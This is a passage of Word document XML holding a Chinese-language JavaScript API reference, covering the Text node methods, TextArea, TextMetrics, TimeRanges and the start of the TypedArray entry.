        <w:t>插入到</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>节点的</w:t>
      </w:r>
      <w:r>
        <w:t>offset</w:t>
      </w:r>
      <w:r>
        <w:t>位置处。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>void replaceData(unsigned long offset,unsigned long count,str</w:t>
      </w:r>
      <w:r>
        <w:t>ing text)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法用字符串</w:t>
      </w:r>
      <w:r>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:t>的内容替换自</w:t>
      </w:r>
      <w:r>
        <w:t>offset</w:t>
      </w:r>
      <w:r>
        <w:t>开始的</w:t>
      </w:r>
      <w:r>
        <w:t>count</w:t>
      </w:r>
      <w:r>
        <w:t>个字符。如果</w:t>
      </w:r>
      <w:r>
        <w:t>offset</w:t>
      </w:r>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:t>count</w:t>
      </w:r>
      <w:r>
        <w:t>的和大于</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>节点的长度，则从</w:t>
      </w:r>
      <w:r>
        <w:t>offset</w:t>
      </w:r>
      <w:r>
        <w:t>开始的所有字符都将替换。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Text replaceWholeText(string text)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法创建一个包含指定</w:t>
      </w:r>
      <w:r>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:t>的新的</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>节点。然后，当前节点及所有相邻的</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>节点都将被这个新节点替换，最后返回这个新的节点。参见上面的</w:t>
      </w:r>
      <w:r>
        <w:t>wholeText</w:t>
      </w:r>
      <w:r>
        <w:t>属性以及</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>normalize()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Text </w:t>
      </w:r>
      <w:r>
        <w:t>splitText(unsigned long offset)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法将</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>节点在指定的</w:t>
      </w:r>
      <w:r>
        <w:t>offset</w:t>
      </w:r>
      <w:r>
        <w:t>处切分为两个。原来的</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>节点会改变，它将由从开始位置到（但不包含）</w:t>
      </w:r>
      <w:r>
        <w:t>offset</w:t>
      </w:r>
      <w:r>
        <w:t>的所有文本组成。同时，将创建一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>节点，包含从（并且包含）</w:t>
      </w:r>
      <w:r>
        <w:t>offset</w:t>
      </w:r>
      <w:r>
        <w:t>位置到字符串结尾的所有字符。这个新的</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>节点将是这个方法的返回值。另外，如果原来的</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>节点有父节点</w:t>
      </w:r>
      <w:r>
        <w:t>parentNode</w:t>
      </w:r>
      <w:r>
        <w:t>，则新节点将插入到这个父节点中，紧跟在原来的节点后面。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string substringData(unsigned l</w:t>
      </w:r>
      <w:r>
        <w:t>ong offset,unsigned long count)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>这个方法从</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>节点的文本中提取出一个子串，内容为自位置</w:t>
      </w:r>
      <w:r>
        <w:t>offset</w:t>
      </w:r>
      <w:r>
        <w:t>开始的</w:t>
      </w:r>
      <w:r>
        <w:t>count</w:t>
      </w:r>
      <w:r>
        <w:t>个字符。如果</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>节点包含的文本非常多，用这个方法可能会比用</w:t>
      </w:r>
      <w:r>
        <w:t>String.substring()</w:t>
      </w:r>
      <w:r>
        <w:t>更有效率。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="877" w:name="TextArea"/>
      <w:r>
        <w:t>TextArea</w:t>
      </w:r>
      <w:bookmarkEnd w:id="877"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>多行文本输入区</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>FormControl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>TextArea</w:t>
      </w:r>
      <w:r>
        <w:t>对象表示</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>textarea</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，通常在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>表单中用于创建多行的文本输入区。文本输入区的的初始值在＜</w:t>
      </w:r>
      <w:r>
        <w:t>textarea</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>/textarea</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签之间以纯文本格式指定。可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>属性查询或设置显示的文本。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>TextArea</w:t>
      </w:r>
      <w:r>
        <w:t>是一个类似</w:t>
      </w:r>
      <w:r>
        <w:t>Input</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Select</w:t>
      </w:r>
      <w:r>
        <w:t>的表单控件。类似这些对象，它也定义了</w:t>
      </w:r>
      <w:r>
        <w:t>form</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>属性，以及</w:t>
      </w:r>
      <w:r>
        <w:t>FormControl</w:t>
      </w:r>
      <w:r>
        <w:t>文档中提到的其他属性及方法。</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w:t>
      </w:r>
      <w:r>
        <w:t>TextArea</w:t>
      </w:r>
      <w:r>
        <w:t>元素也定义了</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>FormControl</w:t>
      </w:r>
      <w:r>
        <w:t>的属性，同时还使用下面的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>属性映射了若干</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>属性：</w:t>
      </w:r>
      <w:r>
        <w:t>cols</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>maxLength</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>rows</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>placeholder</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>readOnly</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>re</w:t>
      </w:r>
      <w:r>
        <w:t>quired</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>wrap</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string defaultValue</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前＜</w:t>
      </w:r>
      <w:r>
        <w:t>textarea</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的初始纯文本内容。当表单重置时，文本区将重置为这个值。这个属性相当于从</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>继承的</w:t>
      </w:r>
      <w:r>
        <w:t>textContent</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned long selectionEnd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回或设置选中文本后面的第一个输入字符的索引。也可参见</w:t>
      </w:r>
      <w:r>
        <w:t>setSelectionRange()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned long selectionStart</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回或设置当前＜</w:t>
      </w:r>
      <w:r>
        <w:t>textarea</w:t>
      </w:r>
      <w:r>
        <w:t>＞中第一个选中字符的索引。也可参见</w:t>
      </w:r>
      <w:r>
        <w:t>setSelectionRa</w:t>
      </w:r>
      <w:r>
        <w:t>nge()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly unsigned long textLength</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>属性（参见</w:t>
      </w:r>
      <w:r>
        <w:t>FormControl</w:t>
      </w:r>
      <w:r>
        <w:t>）的字符数。</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除了这儿列出的方法，</w:t>
      </w:r>
      <w:r>
        <w:t>TextArea</w:t>
      </w:r>
      <w:r>
        <w:t>元素也实现了</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>FormControl</w:t>
      </w:r>
      <w:r>
        <w:t>的方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void select()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法选中当前＜</w:t>
      </w:r>
      <w:r>
        <w:t>textarea</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素显示的所有文本。在大多数浏览器中，这意味着这些文本将高亮显示，用户新输入的文本将替换这些高亮显示的文本而不是追加到它们后面。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void setSelectionRange(unsigned long st</w:t>
      </w:r>
      <w:r>
        <w:t>art,unsigned long end)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>选中当前＜</w:t>
      </w:r>
      <w:r>
        <w:t>textarea</w:t>
      </w:r>
      <w:r>
        <w:t>＞中显示的文本，从位置</w:t>
      </w:r>
      <w:r>
        <w:t>start</w:t>
      </w:r>
      <w:r>
        <w:t>处的字符开始，一直到（但不包括）位置</w:t>
      </w:r>
      <w:r>
        <w:t>end</w:t>
      </w:r>
      <w:r>
        <w:t>处的字符。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="878" w:name="TextMetrics"/>
      <w:r>
        <w:t>TextMetrics</w:t>
      </w:r>
      <w:bookmarkEnd w:id="878"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>字符串或文本的度量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>TextMetrics</w:t>
      </w:r>
      <w:r>
        <w:t>对象由</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasRenderingContext2D</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>measureText()</w:t>
      </w:r>
      <w:r>
        <w:t>方法返回。它的</w:t>
      </w:r>
      <w:r>
        <w:t>width</w:t>
      </w:r>
      <w:r>
        <w:t>属性为度量过的文本的宽度，单位为</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>像素。将来可能还会添加更多的度量。</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readonly double width</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>度量过的文本的宽度，单位为</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>像素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="879" w:name="TimeRanges"/>
      <w:r>
        <w:t>TimeRanges</w:t>
      </w:r>
      <w:bookmarkEnd w:id="879"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>媒体时间区间的集合</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>MediaElement</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>buffered</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>played</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>seekable</w:t>
      </w:r>
      <w:r>
        <w:t>属性分别表示媒体时间轴的一部分缓存了数据、已经播放过了以及可以从当前位置回放。时间轴的这些部分可能包含多个互不相交的时间区间（比如，当用户跳到一个视频的中间时，对</w:t>
      </w:r>
      <w:r>
        <w:t>played</w:t>
      </w:r>
      <w:r>
        <w:t>属性来说就是这样）。一个</w:t>
      </w:r>
      <w:r>
        <w:t>TimeRanges</w:t>
      </w:r>
      <w:r>
        <w:t>对象代表</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>个或多个互不相交的时间区间。它的</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性指明区间的数目，</w:t>
      </w:r>
      <w:r>
        <w:t>start()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>end()</w:t>
      </w:r>
      <w:r>
        <w:t>方法则返回每个区间的边界。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>由</w:t>
      </w:r>
      <w:r>
        <w:t>MediaElement</w:t>
      </w:r>
      <w:r>
        <w:t>返回的</w:t>
      </w:r>
      <w:r>
        <w:t>TimeRang</w:t>
      </w:r>
      <w:r>
        <w:t>es</w:t>
      </w:r>
      <w:r>
        <w:t>对象总是规范化的（</w:t>
      </w:r>
      <w:r>
        <w:t>normalized</w:t>
      </w:r>
      <w:r>
        <w:t>），这就是说，它们包含的区间总是有序的、非空的，也不会相互连接或重叠。</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当前</w:t>
      </w:r>
      <w:r>
        <w:t>TimeRanges</w:t>
      </w:r>
      <w:r>
        <w:t>对象代表的区间的数目。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>double end(unsigned long n)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回时间区间</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>的结束时间（单位为秒），如果</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>小于</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>或大于等于</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>则抛出异常。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>double start(unsigned long n)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回时间区间</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>的开始时间（单位为秒），如果</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>小于</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>或大于等于</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>则抛</w:t>
      </w:r>
      <w:r>
        <w:t>出异常。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="880" w:name="TypedArray"/>
      <w:r>
        <w:t>TypedArray</w:t>
      </w:r>
      <w:bookmarkEnd w:id="880"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>固定尺寸的二进制数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ArrayBufferView</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>TypeArray</w:t>
      </w:r>
      <w:r>
        <w:t>是一个</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBufferView</w:t>
      </w:r>
      <w:r>
        <w:t>，它将一个基本的</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBuffer</w:t>
      </w:r>
      <w:r>
        <w:t>的字节转换为一个由数字组成的数组，并允许读或写这个数组的元素。这儿没有单独的名为</w:t>
      </w:r>
      <w:r>
        <w:t>TypedArray</w:t>
      </w:r>
      <w:r>
        <w:t>的文档，实际上，它包含</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>个不同类型的类型化数组（</w:t>
      </w:r>
      <w:r>
        <w:t>typed array</w:t>
      </w:r>
      <w:r>
        <w:t>）。这</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>种类型都是</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBufferView</w:t>
      </w:r>
      <w:r>
        <w:t>的子类型，它们彼此之间的不同只在于每个数组元素的字节数以及解释这些字节的方式。这</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>种类型是：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Int8Array</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>每</w:t>
      </w:r>
      <w:r>
        <w:t>个数组元素一个字节，解释为一个有符号整数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Int16Array</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>每个数组元素两个字节，解释为一个有符号整数，使用平台字节顺序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Int32Array</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>每个数组元素</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个字节，解释为一个有符号整数，使用平台字节顺序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Uint8Array</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
